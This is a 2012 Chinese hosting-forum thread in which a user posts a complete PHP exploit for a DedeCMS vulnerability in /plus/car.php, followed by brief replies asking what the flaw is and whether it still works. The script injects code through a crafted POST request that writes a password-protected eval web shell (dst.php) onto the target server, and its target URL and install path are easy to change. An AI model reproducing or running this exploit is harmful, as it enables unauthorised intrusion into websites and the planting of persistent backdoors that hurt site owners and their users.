全球主机交流论坛

标题: dede那个漏洞的exp [打印本页]

作者: master 时间: 2012-3-24 16:17
标题: dede那个漏洞的exp
<?php//author：舞林//date : 2012-03-21 00:31:05//shell一句话地址，/plus/dst.php 密码cmd//www.t.com/dede/plus/car.phperror_reporting(E_ERROR);set_time_limit(0);$url ='www.t.com';//目标站url$dir ='/dede';//dedecms安装目录//$content = '$a=${@phpinfo()};';$content ='$a=${@file_put_contents("dst.php","<?php eval(\$_POST[cmd]); ?>")};';$data = "POST $dir/plus/car.php HTTP/1.1\r\n";$data .= "Host: localhost\r\n";$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$data .= "Content-Length: ".strlen($content)."\r\n\r\n";$data .= $content."\r\n";$socket=fsockopen($url,'80');if ($socket) { fwrite($socket,$data); while (!feof($socket)) { $exp.=fgets($socket, 1024); } echo $exp;}else{ echo 'socket err';}?>

作者: jayfan 时间: 2012-3-24 16:20
这是啥漏洞？

作者: a7898585 时间: 2012-3-24 16:23
提示: 作者被禁止或删除内容自动屏蔽

作者: 失足大叔 时间: 2012-3-24 16:23
新版不知道修复没有呢

作者: fhs 时间: 2012-3-24 16:32
看起来很高级的样子

作者: 51sky 时间: 2012-3-24 16:35

MJJ

作者: 淘金者 时间: 2012-3-24 16:39
这个如何利用，弄个视频教程啊！

作者: xspoco 时间: 2012-3-24 16:59

可以排版一下吗..

作者: windywinter 时间: 2012-3-24 17:24
好像无效了

作者: 网警 时间: 2012-3-24 17:33
准备抓捕

作者: hackfengl 时间: 2012-3-25 09:37

网警发表于 2012-3-24 17:33
准备抓捕

欢迎光临全球主机交流论坛 (https://sunk.eu.org/)